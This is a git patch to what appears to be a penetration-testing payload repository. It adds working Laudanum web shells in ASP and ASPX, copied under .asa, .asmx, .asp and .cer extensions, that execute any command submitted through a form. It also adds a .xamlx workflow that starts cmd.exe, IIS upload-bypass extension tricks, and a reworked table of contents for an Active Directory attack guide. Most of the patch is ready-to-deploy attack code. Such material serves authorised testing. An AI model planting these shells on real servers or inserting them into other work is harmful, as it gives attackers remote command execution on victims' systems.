From 00684a10cdd79246da13b34678fdb4f3161ccb77 Mon Sep 17 00:00:00 2001
From: Swissky <12152583+swisskyrepo@users.noreply.github.com>
Date: Sat, 16 Nov 2019 14:53:42 +0100
Subject: [PATCH] IIS asp shell with .asa, .cer, .xamlx

---
 .../Active Directory Attack.md                | 106 ++++++++------
 .../Configuration IIS web.config/web.config   |   2 +-
 Upload Insecure Files/Extension ASP/shell.asa |  83 +++++++++++
 .../Extension ASP/shell.asmx                  |  83 +++++++++++
 Upload Insecure Files/Extension ASP/shell.asp |  83 +++++++++++
 .../Extension ASP/shell.aspx                  | 129 ++++++++++++++++++
 Upload Insecure Files/Extension ASP/shell.cer |  83 +++++++++++
 .../Extension ASP/shell.xamlx                 |  16 +++
 Upload Insecure Files/README.md               |   2 +-
 9 files changed, 547 insertions(+), 40 deletions(-)
 create mode 100644 Upload Insecure Files/Extension ASP/shell.asa
 create mode 100644 Upload Insecure Files/Extension ASP/shell.asmx
 create mode 100644 Upload Insecure Files/Extension ASP/shell.asp
 create mode 100644 Upload Insecure Files/Extension ASP/shell.aspx
 create mode 100644 Upload Insecure Files/Extension ASP/shell.cer
 create mode 100644 Upload Insecure Files/Extension ASP/shell.xamlx

diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md
index 57f9df3..d0ad6c7 100644
--- a/Methodology and Resources/Active Directory Attack.md	
+++ b/Methodology and Resources/Active Directory Attack.md	
@@ -2,44 +2,64 @@
 
 ## Summary
 
-* [Tools](#tools)
-* [Most common paths to AD compromise](#most-common-paths-to-ad-compromise)
-  * [MS14-068 (Microsoft Kerberos Checksum Validation Vulnerability)](#ms14-068-microsoft-kerberos-checksum-validation-vulnerability)
-  * [Open Shares](#open-shares)
-  * [SCF file attack against writeable share](#scf-file-attack-against-writeable-share)
-  * [GPO - Pivoting with Local Admin & Passwords in SYSVOL](#gpo---pivoting-with-local-admin--passwords-in-sysvol)
-  * [Dumping AD Domain Credentials](#dumping-ad-domain-credentials-systemrootntdsntdsdit)
-    * Using ndtsutil
-    * Using Vshadow
-    * Using vssadmin
-    * Using DiskShadow
-    * Using Mimikatz DCSync
-    * Using Mimikatz sekurlsa
-  * [Password spraying](#password-spraying)
-  * [Password in AD User comment](#password-in-ad-user-comment)
-  * [Pass-the-Ticket Golden Tickets](#pass-the-ticket-golden-tickets)
-  * [Pass-the-Ticket Silver Tickets](#pass-the-ticket-silver-tickets)
-  * [Kerberoasting](#kerberoasting)
-  * [KRB_AS_REP roasting](#krb_as_rep-roasting)
-  * [Pass-the-Hash](#pass-the-hash)
-  * [OverPass-the-Hash (pass the key)](#overpass-the-hash-pass-the-key)
-  * [Capturing and cracking NTLMv2 hashes](#capturing-and-cracking-ntlmv2-hashes)
-  * [NTLMv2 hashes relaying](#ntlmv2-hashes-relaying)
-    * [MS08-068 NTLM reflection](#ms08-068-ntlm-reflection)
-    * [SMB Signing Disabled and IPv4](#smb-signing-disabled-and-ipv4)
-    * [SMB Signing Disabled and IPv6](#smb-signing-disabled-and-ipv6)
-    * [Drop the MIC](#drop-the-mic)
-    * [Ghost Potato](#ghost-potato)
-  * [Dangerous Built-in Groups Usage](#dangerous-built-in-groups-usage)
-  * [Trust relationship between domains](#trust-relationship-between-domains)
-  * [Child Domain to Forest Compromise - SID Hijacking](#child-domain-to-forest-compromise---sid-hijacking)
-  * [Unconstrained delegation](#unconstrained-delegation)
-  * [Resource-Based Constrained Delegation](#resource-based-constrained-delegation)
-  * [Relay delegation with mitm6](#relay-delegation-with-mitm6)
-  * [PrivExchange attack](#privexchange-attack)
-  * [Extract accounts from /etc/krb5.keytab](#extract-accounts-from-etc-krb5-keytab)
-  * [PXE Boot image attack](#pxe-boot-image-attack)
-  * [Impersonating Office 365 Users on Azure AD Connect](#impersonating-office-365-users-on-azure-ad-connect)
+- [Active Directory Attacks](#active-directory-attacks)
+  - [Summary](#summary)
+  - [Tools](#tools)
+  - [Most common paths to AD compromise](#most-common-paths-to-ad-compromise)
+    - [MS14-068 (Microsoft Kerberos Checksum Validation Vulnerability)](#ms14-068-microsoft-kerberos-checksum-validation-vulnerability)
+    - [Open Shares](#open-shares)
+    - [SCF and URL file attack against writeable share](#scf-and-url-file-attack-against-writeable-share)
+    - [GPO - Pivoting with Local Admin & Passwords in SYSVOL](#gpo---pivoting-with-local-admin--passwords-in-sysvol)
+    - [Dumping AD Domain Credentials (%SystemRoot%\NTDS\Ntds.dit)](#dumping-ad-domain-credentials-systemrootntdsntdsdit)
+      - [Using ndtsutil](#using-ndtsutil)
+      - [Using Vshadow](#using-vshadow)
+      - [Using vssadmin](#using-vssadmin)
+      - [Using DiskShadow (a Windows signed binary)](#using-diskshadow-a-windows-signed-binary)
+      - [Using esentutl.exe](#using-esentutlexe)
+      - [Extract hashes from ntds.dit](#extract-hashes-from-ntdsdit)
+      - [Alternatives - modules](#alternatives---modules)
+      - [Using Mimikatz DCSync](#using-mimikatz-dcsync)
+      - [Using Mimikatz sekurlsa](#using-mimikatz-sekurlsa)
+    - [Password spraying](#password-spraying)
+      - [Using `kerbrute`, a tool to perform Kerberos pre-auth bruteforcing.](#using-kerbrute-a-tool-to-perform-kerberos-pre-auth-bruteforcing)
+      - [Using `crackmapexec` and `mp64` to generate passwords and spray them against SMB services on the network.](#using-crackmapexec-and-mp64-to-generate-passwords-and-spray-them-against-smb-services-on-the-network)
+      - [Using RDPassSpray to target RDP services.](#using-rdpassspray-to-target-rdp-services)
+      - [Using [hydra]() and [ncrack]() to target RDP services.](#using-hydra-and-ncrack-to-target-rdp-services)
+    - [Password in AD User comment](#password-in-ad-user-comment)
+    - [Pass-the-Ticket Golden Tickets](#pass-the-ticket-golden-tickets)
+      - [Using Mimikatz](#using-mimikatz)
+      - [Using Meterpreter](#using-meterpreter)
+      - [Using a ticket on Linux](#using-a-ticket-on-linux)
+    - [Pass-the-Ticket Silver Tickets](#pass-the-ticket-silver-tickets)
+    - [Kerberoasting](#kerberoasting)
+    - [KRB_AS_REP Roasting](#krbasrep-roasting)
+    - [Pass-the-Hash](#pass-the-hash)
+    - [OverPass-the-Hash (pass the key)](#overpass-the-hash-pass-the-key)
+      - [Using impacket](#using-impacket)
+      - [Using Rubeus](#using-rubeus)
+    - [Capturing and cracking NTLMv2 hashes](#capturing-and-cracking-ntlmv2-hashes)
+    - [NTLMv2 hashes relaying](#ntlmv2-hashes-relaying)
+      - [MS08-068 NTLM reflection](#ms08-068-ntlm-reflection)
+      - [SMB Signing Disabled and IPv4](#smb-signing-disabled-and-ipv4)
+      - [SMB Signing Disabled and IPv6](#smb-signing-disabled-and-ipv6)
+      - [Drop the MIC](#drop-the-mic)
+      - [Ghost Potato - CVE-2019-1384](#ghost-potato---cve-2019-1384)
+    - [Dangerous Built-in Groups Usage](#dangerous-built-in-groups-usage)
+    - [Trust relationship between domains](#trust-relationship-between-domains)
+    - [Child Domain to Forest Compromise - SID Hijacking](#child-domain-to-forest-compromise---sid-hijacking)
+    - [Unconstrained delegation](#unconstrained-delegation)
+      - [Find delegation](#find-delegation)
+      - [Monitor with Rubeus](#monitor-with-rubeus)
+      - [Force a connect back from the DC](#force-a-connect-back-from-the-dc)
+      - [Load the ticket](#load-the-ticket)
+      - [Mitigation](#mitigation)
+    - [Resource-Based Constrained Delegation](#resource-based-constrained-delegation)
+    - [Relay delegation with mitm6](#relay-delegation-with-mitm6)
+    - [PrivExchange attack](#privexchange-attack)
+    - [Extract accounts from /etc/krb5.keytab](#extract-accounts-from-etckrb5keytab)
+    - [PXE Boot image attack](#pxe-boot-image-attack)
+    - [Impersonating Office 365 Users on Azure AD Connect](#impersonating-office-365-users-on-azure-ad-connect)
+  - [References](#references)
 
 ## Tools
 
@@ -824,6 +844,16 @@ If a machine has `SMB signing`:`disabled`, it is possible to use Responder with
     $ proxychains mssqlclient.py contoso/normaluser1@192.168.48.230 -windows-auth
     ```
 
+Mitigations:
+
+ * Disable LLMNR via group policy
+    ```powershell
+    Open gpedit.msc and navigate to Computer Configuration > Administrative Templates > Network > DNS Client > Turn off multicast name resolution and set to Enabled
+    ```
+ * Disable NBT-NS
+    ```powershell
+    This can be achieved by navigating through the GUI to Network card > Properties > IPv4 > Advanced > WINS and then under "NetBIOS setting" select Disable NetBIOS over TCP/IP
+    ```
 
 #### SMB Signing Disabled and IPv6
 
diff --git a/Upload Insecure Files/Configuration IIS web.config/web.config b/Upload Insecure Files/Configuration IIS web.config/web.config
index 7036fdc..c14f37e 100644
--- a/Upload Insecure Files/Configuration IIS web.config/web.config	
+++ b/Upload Insecure Files/Configuration IIS web.config/web.config	
@@ -2,7 +2,7 @@
 <configuration>
    <system.webServer>
       <handlers accessPolicy="Read, Script, Write">
-         <add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64″ />
+         <add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" />
       </handlers>
       <security>
          <requestFiltering>
diff --git a/Upload Insecure Files/Extension ASP/shell.asa b/Upload Insecure Files/Extension ASP/shell.asa
new file mode 100644
index 0000000..b2caf59
--- /dev/null
+++ b/Upload Insecure Files/Extension ASP/shell.asa	
@@ -0,0 +1,83 @@
+<%
+' *******************************************************************************
+' ***
+' *** Laudanum Project
+' *** A Collection of Injectable Files used during a Penetration Test
+' ***
+' *** More information is available at:
+' ***  http://laudanum.secureideas.net
+' ***  laudanum@secureideas.net
+' ***
+' ***  Project Leads:
+' ***         Kevin Johnson <kjohnson@secureideas.net
+' ***         Tim Medin <tim@securitywhole.com>
+' ***
+' *** Copyright 2012 by Kevin Johnson and the Laudanum Team
+' ***
+' ********************************************************************************
+' ***
+' ***   Updated and fixed by Robin Wood <Digininja>
+' ***   Updated and fixed by Tim Medin <tim@securitywhole.com
+' ***
+' ********************************************************************************
+' *** This program is free software; you can redistribute it and/or
+' *** modify it under the terms of the GNU General Public License
+' *** as published by the Free Software Foundation; either version 2
+' *** of the License, or (at your option) any later version.
+' ***
+' *** This program is distributed in the hope that it will be useful,
+' *** but WITHOUT ANY WARRANTY; without even the implied warranty of
+' *** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+' *** GNU General Public License for more details.
+' ***
+' *** You can get a copy of the GNU General Public License from this
+' *** address: http://www.gnu.org/copyleft/gpl.html#SEC1
+' *** You can also write to the Free Software Foundation, Inc., Temple
+' *** Place - Suite  Boston, MA   USA.
+' ***
+' ***************************************************************************** */
+
+
+' can set this to 0 for never time out but don't want to kill the server if a script
+' goes into a loop for any reason
+Server.ScriptTimeout = 180
+
+ip=request.ServerVariables("REMOTE_ADDR")
+if ip<>"1.2.3.4" then
+ response.Status="404 Page Not Found"
+ response.Write(response.Status)
+ response.End
+end if
+
+if Request.Form("submit") <> "" then
+   Dim wshell, intReturn, strPResult
+   cmd = Request.Form("cmd")
+   Response.Write ("Running command: " & cmd & "<br />")
+   set wshell = CreateObject("WScript.Shell")
+   Set objCmd = wShell.Exec(cmd)
+   strPResult = objCmd.StdOut.Readall()
+
+   response.write "<br><pre>" & replace(replace(strPResult,"<","&lt;"),vbCrLf,"<br>") & "</pre>"
+
+   set wshell = nothing
+end if
+
+%>
+<html>
+<head><title>Laundanum ASP Shell</title></head>
+<body onload="document.shell.cmd.focus()">
+<form action="shell.asp" method="POST" name="shell">
+Command: <Input width="200" type="text" name="cmd" value="<%=cmd%>" /><br />
+<input type="submit" name="submit" value="Submit" />
+<p>Don't forget that if you want to shell command (not a specific executable) you need to call cmd.exe. It is usually located at C:\Windows\System32\cmd.exe, but to be safe just call %ComSpec%. Also, don't forget to use the /c switch so cmd.exe terminates when your command is done.
+<p>Example command to do a directory listing:<br>
+%ComSpec% /c dir
+</form>
+<hr/>
+<address>
+Copyright &copy; 2012, <a href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br/>
+Written by Tim Medin.<br/>
+Get the latest version at <a href="http://laudanum.secureideas.net">laudanum.secureideas.net</a>.
+</address>
+</body>
+</html>
\ No newline at end of file
diff --git a/Upload Insecure Files/Extension ASP/shell.asmx b/Upload Insecure Files/Extension ASP/shell.asmx
new file mode 100644
index 0000000..b2caf59
--- /dev/null
+++ b/Upload Insecure Files/Extension ASP/shell.asmx	
@@ -0,0 +1,83 @@
+<%
+' *******************************************************************************
+' ***
+' *** Laudanum Project
+' *** A Collection of Injectable Files used during a Penetration Test
+' ***
+' *** More information is available at:
+' ***  http://laudanum.secureideas.net
+' ***  laudanum@secureideas.net
+' ***
+' ***  Project Leads:
+' ***         Kevin Johnson <kjohnson@secureideas.net
+' ***         Tim Medin <tim@securitywhole.com>
+' ***
+' *** Copyright 2012 by Kevin Johnson and the Laudanum Team
+' ***
+' ********************************************************************************
+' ***
+' ***   Updated and fixed by Robin Wood <Digininja>
+' ***   Updated and fixed by Tim Medin <tim@securitywhole.com
+' ***
+' ********************************************************************************
+' *** This program is free software; you can redistribute it and/or
+' *** modify it under the terms of the GNU General Public License
+' *** as published by the Free Software Foundation; either version 2
+' *** of the License, or (at your option) any later version.
+' ***
+' *** This program is distributed in the hope that it will be useful,
+' *** but WITHOUT ANY WARRANTY; without even the implied warranty of
+' *** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+' *** GNU General Public License for more details.
+' ***
+' *** You can get a copy of the GNU General Public License from this
+' *** address: http://www.gnu.org/copyleft/gpl.html#SEC1
+' *** You can also write to the Free Software Foundation, Inc., Temple
+' *** Place - Suite  Boston, MA   USA.
+' ***
+' ***************************************************************************** */
+
+
+' can set this to 0 for never time out but don't want to kill the server if a script
+' goes into a loop for any reason
+Server.ScriptTimeout = 180
+
+ip=request.ServerVariables("REMOTE_ADDR")
+if ip<>"1.2.3.4" then
+ response.Status="404 Page Not Found"
+ response.Write(response.Status)
+ response.End
+end if
+
+if Request.Form("submit") <> "" then
+   Dim wshell, intReturn, strPResult
+   cmd = Request.Form("cmd")
+   Response.Write ("Running command: " & cmd & "<br />")
+   set wshell = CreateObject("WScript.Shell")
+   Set objCmd = wShell.Exec(cmd)
+   strPResult = objCmd.StdOut.Readall()
+
+   response.write "<br><pre>" & replace(replace(strPResult,"<","&lt;"),vbCrLf,"<br>") & "</pre>"
+
+   set wshell = nothing
+end if
+
+%>
+<html>
+<head><title>Laundanum ASP Shell</title></head>
+<body onload="document.shell.cmd.focus()">
+<form action="shell.asp" method="POST" name="shell">
+Command: <Input width="200" type="text" name="cmd" value="<%=cmd%>" /><br />
+<input type="submit" name="submit" value="Submit" />
+<p>Don't forget that if you want to shell command (not a specific executable) you need to call cmd.exe. It is usually located at C:\Windows\System32\cmd.exe, but to be safe just call %ComSpec%. Also, don't forget to use the /c switch so cmd.exe terminates when your command is done.
+<p>Example command to do a directory listing:<br>
+%ComSpec% /c dir
+</form>
+<hr/>
+<address>
+Copyright &copy; 2012, <a href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br/>
+Written by Tim Medin.<br/>
+Get the latest version at <a href="http://laudanum.secureideas.net">laudanum.secureideas.net</a>.
+</address>
+</body>
+</html>
\ No newline at end of file
diff --git a/Upload Insecure Files/Extension ASP/shell.asp b/Upload Insecure Files/Extension ASP/shell.asp
new file mode 100644
index 0000000..b2caf59
--- /dev/null
+++ b/Upload Insecure Files/Extension ASP/shell.asp	
@@ -0,0 +1,83 @@
+<%
+' *******************************************************************************
+' ***
+' *** Laudanum Project
+' *** A Collection of Injectable Files used during a Penetration Test
+' ***
+' *** More information is available at:
+' ***  http://laudanum.secureideas.net
+' ***  laudanum@secureideas.net
+' ***
+' ***  Project Leads:
+' ***         Kevin Johnson <kjohnson@secureideas.net
+' ***         Tim Medin <tim@securitywhole.com>
+' ***
+' *** Copyright 2012 by Kevin Johnson and the Laudanum Team
+' ***
+' ********************************************************************************
+' ***
+' ***   Updated and fixed by Robin Wood <Digininja>
+' ***   Updated and fixed by Tim Medin <tim@securitywhole.com
+' ***
+' ********************************************************************************
+' *** This program is free software; you can redistribute it and/or
+' *** modify it under the terms of the GNU General Public License
+' *** as published by the Free Software Foundation; either version 2
+' *** of the License, or (at your option) any later version.
+' ***
+' *** This program is distributed in the hope that it will be useful,
+' *** but WITHOUT ANY WARRANTY; without even the implied warranty of
+' *** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+' *** GNU General Public License for more details.
+' ***
+' *** You can get a copy of the GNU General Public License from this
+' *** address: http://www.gnu.org/copyleft/gpl.html#SEC1
+' *** You can also write to the Free Software Foundation, Inc., Temple
+' *** Place - Suite  Boston, MA   USA.
+' ***
+' ***************************************************************************** */
+
+
+' can set this to 0 for never time out but don't want to kill the server if a script
+' goes into a loop for any reason
+Server.ScriptTimeout = 180
+
+ip=request.ServerVariables("REMOTE_ADDR")
+if ip<>"1.2.3.4" then
+ response.Status="404 Page Not Found"
+ response.Write(response.Status)
+ response.End
+end if
+
+if Request.Form("submit") <> "" then
+   Dim wshell, intReturn, strPResult
+   cmd = Request.Form("cmd")
+   Response.Write ("Running command: " & cmd & "<br />")
+   set wshell = CreateObject("WScript.Shell")
+   Set objCmd = wShell.Exec(cmd)
+   strPResult = objCmd.StdOut.Readall()
+
+   response.write "<br><pre>" & replace(replace(strPResult,"<","&lt;"),vbCrLf,"<br>") & "</pre>"
+
+   set wshell = nothing
+end if
+
+%>
+<html>
+<head><title>Laundanum ASP Shell</title></head>
+<body onload="document.shell.cmd.focus()">
+<form action="shell.asp" method="POST" name="shell">
+Command: <Input width="200" type="text" name="cmd" value="<%=cmd%>" /><br />
+<input type="submit" name="submit" value="Submit" />
+<p>Don't forget that if you want to shell command (not a specific executable) you need to call cmd.exe. It is usually located at C:\Windows\System32\cmd.exe, but to be safe just call %ComSpec%. Also, don't forget to use the /c switch so cmd.exe terminates when your command is done.
+<p>Example command to do a directory listing:<br>
+%ComSpec% /c dir
+</form>
+<hr/>
+<address>
+Copyright &copy; 2012, <a href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br/>
+Written by Tim Medin.<br/>
+Get the latest version at <a href="http://laudanum.secureideas.net">laudanum.secureideas.net</a>.
+</address>
+</body>
+</html>
\ No newline at end of file
diff --git a/Upload Insecure Files/Extension ASP/shell.aspx b/Upload Insecure Files/Extension ASP/shell.aspx
new file mode 100644
index 0000000..5de53ad
--- /dev/null
+++ b/Upload Insecure Files/Extension ASP/shell.aspx	
@@ -0,0 +1,129 @@
+<%@ Page Language="C#"%>
+<%@ Import Namespace="System" %>
+
+<script runat="server">
+
+/* *****************************************************************************
+***
+*** Laudanum Project
+*** A Collection of Injectable Files used during a Penetration Test
+***
+*** More information is available at:
+***  http://laudanum.secureideas.net
+***  laudanum@secureideas.net
+***
+***  Project Leads:
+***         Kevin Johnson <kjohnson@secureideas.net>
+***         Tim Medin <tim@securitywhole.com>
+***
+*** Copyright 2012 by Kevin Johnson and the Laudanum Team
+***
+********************************************************************************
+***
+*** This file provides shell access to the system.
+***
+********************************************************************************
+*** This program is free software; you can redistribute it and/or
+*** modify it under the terms of the GNU General Public License
+*** as published by the Free Software Foundation; either version 2
+*** of the License, or (at your option) any later version.
+***
+*** This program is distributed in the hope that it will be useful,
+*** but WITHOUT ANY WARRANTY; without even the implied warranty of
+*** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+*** GNU General Public License for more details.
+***
+*** You can get a copy of the GNU General Public License from this
+*** address: http://www.gnu.org/copyleft/gpl.html#SEC1
+*** You can also write to the Free Software Foundation, Inc., 59 Temple
+*** Place - Suite 330, Boston, MA  02111-1307, USA.
+***
+***************************************************************************** */
+
+string stdout = "";
+string stderr = "";
+
+void die() {
+	//HttpContext.Current.Response.Clear();
+	HttpContext.Current.Response.StatusCode = 404;
+	HttpContext.Current.Response.StatusDescription = "Not Found";
+	HttpContext.Current.Response.Write("<h1>404 Not Found</h1>");
+	HttpContext.Current.Server.ClearError();
+	HttpContext.Current.Response.End();
+}
+
+void Page_Load(object sender, System.EventArgs e) {
+
+	// Check for an IP in the range we want
+	string[] allowedIps = new string[] {"::1","192.168.0.1", "127.0.0.1"};
+	
+	// check if the X-Fordarded-For header exits
+	string remoteIp;
+	if (HttpContext.Current.Request.Headers["X-Forwarded-For"] == null) {
+		remoteIp = Request.UserHostAddress;
+	} else {
+		remoteIp = HttpContext.Current.Request.Headers["X-Forwarded-For"].Split(new char[] { ',' })[0]; 
+	}
+
+	bool validIp = false;
+	foreach (string ip in allowedIps) {
+		validIp = (validIp || (remoteIp == ip));
+	}
+	
+	if (!validIp) {
+		die();
+	}
+	
+	if (Request.Form["c"] != null) {
+	// do or do not, there is no try
+	//try {
+		// create the ProcessStartInfo using "cmd" as the program to be run, and "/c " as the parameters.
+		// "/c" tells cmd that we want it to execute the command that follows, and exit.
+		System.Diagnostics.ProcessStartInfo procStartInfo = new System.Diagnostics.ProcessStartInfo("cmd", "/c " + Request.Form["c"]);
+
+		// The following commands are needed to redirect the standard output and standard error.
+		procStartInfo.RedirectStandardOutput = true;
+		procStartInfo.RedirectStandardError = true;
+		procStartInfo.UseShellExecute = false;
+		// Do not create the black window.
+		procStartInfo.CreateNoWindow = true;
+		// Now we create a process, assign its ProcessStartInfo and start it
+		System.Diagnostics.Process p = new System.Diagnostics.Process();
+		p.StartInfo = procStartInfo;
+		p.Start();
+		// Get the output and error into a string
+		stdout = p.StandardOutput.ReadToEnd();
+		stderr = p.StandardError.ReadToEnd();
+	//}
+	//catch (Exception objException)
+	//{
+	}
+}
+</script>
+<html>
+<head><title>Laundanum ASPX Shell</title></head>
+<body onload="document.shell.c.focus()">
+
+<form method="post" name="shell">
+cmd /c <input type="text" name="c"/>
+<input type="submit"><br/>
+STDOUT:<br/>
+<pre><% = stdout.Replace("<", "&lt;") %></pre>
+<br/>
+<br/>
+<br/>
+STDERR:<br/>
+<pre><% = stderr.Replace("<", "&lt;") %></pre>
+
+
+</form>
+
+  <hr/>
+  <address>
+  Copyright &copy; 2012, <a href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br/>
+  Written by Tim Medin.<br/>
+  Get the latest version at <a href="http://laudanum.secureideas.net">laudanum.secureideas.net</a>.
+  </address>
+
+</body>
+</html>
\ No newline at end of file
diff --git a/Upload Insecure Files/Extension ASP/shell.cer b/Upload Insecure Files/Extension ASP/shell.cer
new file mode 100644
index 0000000..b2caf59
--- /dev/null
+++ b/Upload Insecure Files/Extension ASP/shell.cer	
@@ -0,0 +1,83 @@
+<%
+' *******************************************************************************
+' ***
+' *** Laudanum Project
+' *** A Collection of Injectable Files used during a Penetration Test
+' ***
+' *** More information is available at:
+' ***  http://laudanum.secureideas.net
+' ***  laudanum@secureideas.net
+' ***
+' ***  Project Leads:
+' ***         Kevin Johnson <kjohnson@secureideas.net
+' ***         Tim Medin <tim@securitywhole.com>
+' ***
+' *** Copyright 2012 by Kevin Johnson and the Laudanum Team
+' ***
+' ********************************************************************************
+' ***
+' ***   Updated and fixed by Robin Wood <Digininja>
+' ***   Updated and fixed by Tim Medin <tim@securitywhole.com
+' ***
+' ********************************************************************************
+' *** This program is free software; you can redistribute it and/or
+' *** modify it under the terms of the GNU General Public License
+' *** as published by the Free Software Foundation; either version 2
+' *** of the License, or (at your option) any later version.
+' ***
+' *** This program is distributed in the hope that it will be useful,
+' *** but WITHOUT ANY WARRANTY; without even the implied warranty of
+' *** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+' *** GNU General Public License for more details.
+' ***
+' *** You can get a copy of the GNU General Public License from this
+' *** address: http://www.gnu.org/copyleft/gpl.html#SEC1
+' *** You can also write to the Free Software Foundation, Inc., Temple
+' *** Place - Suite  Boston, MA   USA.
+' ***
+' ***************************************************************************** */
+
+
+' can set this to 0 for never time out but don't want to kill the server if a script
+' goes into a loop for any reason
+Server.ScriptTimeout = 180
+
+ip=request.ServerVariables("REMOTE_ADDR")
+if ip<>"1.2.3.4" then
+ response.Status="404 Page Not Found"
+ response.Write(response.Status)
+ response.End
+end if
+
+if Request.Form("submit") <> "" then
+   Dim wshell, intReturn, strPResult
+   cmd = Request.Form("cmd")
+   Response.Write ("Running command: " & cmd & "<br />")
+   set wshell = CreateObject("WScript.Shell")
+   Set objCmd = wShell.Exec(cmd)
+   strPResult = objCmd.StdOut.Readall()
+
+   response.write "<br><pre>" & replace(replace(strPResult,"<","&lt;"),vbCrLf,"<br>") & "</pre>"
+
+   set wshell = nothing
+end if
+
+%>
+<html>
+<head><title>Laundanum ASP Shell</title></head>
+<body onload="document.shell.cmd.focus()">
+<form action="shell.asp" method="POST" name="shell">
+Command: <Input width="200" type="text" name="cmd" value="<%=cmd%>" /><br />
+<input type="submit" name="submit" value="Submit" />
+<p>Don't forget that if you want to shell command (not a specific executable) you need to call cmd.exe. It is usually located at C:\Windows\System32\cmd.exe, but to be safe just call %ComSpec%. Also, don't forget to use the /c switch so cmd.exe terminates when your command is done.
+<p>Example command to do a directory listing:<br>
+%ComSpec% /c dir
+</form>
+<hr/>
+<address>
+Copyright &copy; 2012, <a href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br/>
+Written by Tim Medin.<br/>
+Get the latest version at <a href="http://laudanum.secureideas.net">laudanum.secureideas.net</a>.
+</address>
+</body>
+</html>
\ No newline at end of file
diff --git a/Upload Insecure Files/Extension ASP/shell.xamlx b/Upload Insecure Files/Extension ASP/shell.xamlx
new file mode 100644
index 0000000..ab0da0f
--- /dev/null
+++ b/Upload Insecure Files/Extension ASP/shell.xamlx	
@@ -0,0 +1,16 @@
+<WorkflowService ConfigurationName="Service1" Name="Service1" xmlns="http://schemas.microsoft.com/netfx/2009/xaml/servicemodel" xmlns:p="http://schemas.microsoft.com/netfx/2009/xaml/activities" xmlns:x="http://schemas.microsoft.com/winfx/2006/xaml" xmlns:p1="http://schemas.microsoft.com/netfx/2009/xaml/activities" >
+ <p:Sequence DisplayName="Sequential Service">
+ <TransactedReceiveScope Request="{x:Reference __r0}">
+ <p1:Sequence >
+ <SendReply DisplayName="SendResponse" >
+ <SendReply.Request>
+ <Receive x:Name="__r0" CanCreateInstance="True" OperationName="SubmitPurchasingProposal" Action="testme" />
+ </SendReply.Request>
+ <SendMessageContent>
+ <p1:InArgument x:TypeArguments="x:String">[System.Diagnostics.Process.Start("cmd.exe", "/c calc").toString()]</p1:InArgument>
+ </SendMessageContent>
+ </SendReply>
+ </p1:Sequence>
+ </TransactedReceiveScope>
+ </p:Sequence>
+</WorkflowService>
\ No newline at end of file
diff --git a/Upload Insecure Files/README.md b/Upload Insecure Files/README.md
index 82347ce..6229f86 100644
--- a/Upload Insecure Files/README.md	
+++ b/Upload Insecure Files/README.md	
@@ -46,7 +46,7 @@ Double extensions
 ### Other extensions
 
 ```powershell
-asp : .asp, .aspx
+asp : .asp, .aspx, .cer and .asa (IIS <= 7.5), shell.aspx;1.jpg (IIS < 7.0)
 perl: .pl, .pm, .cgi, .lib
 jsp : .jsp, .jspx, .jsw, .jsv, .jspf
 Coldfusion: .cfm, .cfml, .cfc, .dbm